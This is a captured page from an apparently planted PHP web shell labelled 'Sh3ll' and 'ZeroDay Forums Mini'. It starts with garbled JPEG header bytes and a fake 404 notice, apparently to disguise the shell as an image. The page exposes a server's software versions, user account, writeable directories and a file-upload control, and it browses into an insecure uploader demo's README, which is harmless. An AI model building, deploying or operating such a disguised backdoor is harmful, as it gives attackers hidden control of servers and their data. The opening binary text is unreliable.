����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/video/uploader-master/demo/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/video/uploader-master/demo/README.md
# DEMO

This page demostrates the most basic setup/config.

## Backend

By default this example uploads files using: <code>demo/backend/upload.php</code>. This piece of PHP logic is provided to upload the files to the <code>backend/files/</code> folder (make sure it has writing permissions).

This is only an example using PHP, of course you can use it with any other type of backend. 

And It's just to demonstrate the flow; the script returns a very basic JSON response  structure (again, this is for this example, you can implement this in any way you want):

### Success response:
```json
{
	"status": "ok",
	"path": "files/5a515f174dea7_Hot_Gril.jpg"
}
```

### Error response:
```json
{
	"status": "error",
	"message": "Exceeded filesize limit"
}
```

# Warning

This is a ***DEMO*** , the backend / PHP provided is very basic. You can use it as a starting point maybe, but ***do not use this on production***. It doesn't preform any server-side validation, checks, authentication, etc.



ZeroDay Forums Mini